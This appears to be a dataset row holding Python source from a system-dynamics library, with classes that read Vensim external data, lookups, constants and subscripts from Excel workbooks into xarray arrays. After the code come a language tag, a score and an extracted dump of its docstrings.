outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
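# Hedged usage sketch of ExtData (file, sheet and cell values below are illustrative):
#   ext = ExtData("?input.xlsx", "Sheet1", time_row_or_col="1", cell="B2",
#                 interp="interpolate", coords={}, root=".", py_name="sales_data")
#   ext.initialize()   # reads the time series and data into an xarray.DataArray
#   ext(5)             # value at time 5, interpolated between the read points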
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
        Function that reads data from the excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
        Function that reads series and data from the excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
            # the length of the 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
        Reshapes a pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
        Selects whether series data (DATA/LOOKUPS) should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
            Cell identifier, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
                # if the cell can be split, the format is
                # "A1"-like and the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
        Add the information needed to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
        Function that reads data from the excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
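# A minimal usage sketch of the classes above, assuming an illustrative
# workbook "inputs.xlsx" with illustrative sheet and cell references (none of
# these names come from a real model):
#
#     constant = ExtConstant(file_name="inputs.xlsx", sheet="Sheet1",
#                            cell="B2", coords={"dim": ["A", "B", "C"]},
#                            root="/path/to/model", py_name="demo_constant")
#     constant.initialize()   # reads the Excel range into self.data (xarray.DataArray)
#     values = constant()     # __call__ returns the cached self.data
#
#     subs = ExtSubscript(file_name="inputs.xlsx", sheet="Sheet1",
#                         firstcell="A2", lastcell="A4", prefix="",
#                         root="/path/to/model")
#     print(subs.subscript)   # e.g. ['A', 'B', 'C']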
| en | 0.685472 | These classes are a collection of the needed tools to read external data. The External type objects created by these classes are initialized before the Stateful objects by functions.Model.initialize. # TODO move to openpyxl Class to save the read Excel files and thus avoid double reading Read the Excel file or return the previously read one Read the Excel file using OpenPyXL or return the previously read one Clean the dictionary of read files Main class of external objects Attributes ---------- py_name: str The python name of the object missing: str ("warning", "error", "ignore", "keep") What to do with missing values. If "warning" (default) shows a warning message and interpolates the values. If "raise" raises an error. If "ignore" interpolates the values without showing anything. If "keep" it will keep the missing values, this option may cause the integration to fail, but it may be used to check the quality of the data. file: str File name from which the data is read. sheet: str Sheet name from which the data is read. Function to read data from excel file using rows and columns Parameters ---------- rows: list of len 2 first row and last row+1 to be read, starting from 0 cols: list of len 2 first col and last col+1 to be read, starting from 0 Returns ------- data: pandas.DataFrame, pandas.Series or float depending on the shape of the requested data # TODO move to openpyxl to avoid pandas dependency in this file. # read data # if it is a single row remove its dimension Function to read data from excel file using cell range name Parameters ---------- cellname: str the cell range name Returns ------- data: numpy.ndarray or float depending on the shape of the requested data # read data # Get the local id of the sheet # needed for searching in locals names # need to lower the sheetnames as Vensim has no case sensitivity # Error if it is not able to get the localSheetId # Search for local and global names # key error if the cellrange doesn't exist in the file or sheet Function thar reads series and data from excel file for DATA and LOOKUPS. Parameters ---------- series_across: "row", "column" or "name" The way to read series file. series_row_or_col: int or str If series_across is "row" the row number where the series data is. If series_across is "column" the column name where the series data is. If series_across is "name" the cell range name where the series data is. cell: If series_across is not "name, the top left cell where the data table starts. Else the name of the cell range where the data 